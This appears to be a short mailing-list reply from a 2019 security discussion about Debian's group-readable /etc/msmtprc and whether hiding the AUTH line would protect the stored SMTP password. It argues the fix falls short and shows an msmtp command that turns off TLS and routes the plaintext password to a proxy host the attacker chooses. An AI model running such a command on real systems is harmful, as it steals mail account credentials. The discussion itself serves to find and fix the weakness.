* Simon Deziel <[email protected]>, 2019-11-05, 10:02:
> Having /etc/msmtprc group readable is AFAIK, a "debianism".
This is my understanding, too.
> I don't know if upstream endorses this method of restricting access to
> the default account's password.
I don't believe they do.
> That said, I think it would be feasible for msmtp to obfuscate the AUTH
> line when the UID/GID do not match the EUID/EGID and the config file
> used is not world-readable.
That wouldn't be sufficient. The attacker could run:
$ msmtp --proxy-host=$HOST --proxy-port=$PORT --tls=off --auth=plain
[email protected] < /dev/null
to make msmtp send the unencrypted password to a proxy server of the
attacker's choice.
--
Jakub Wilk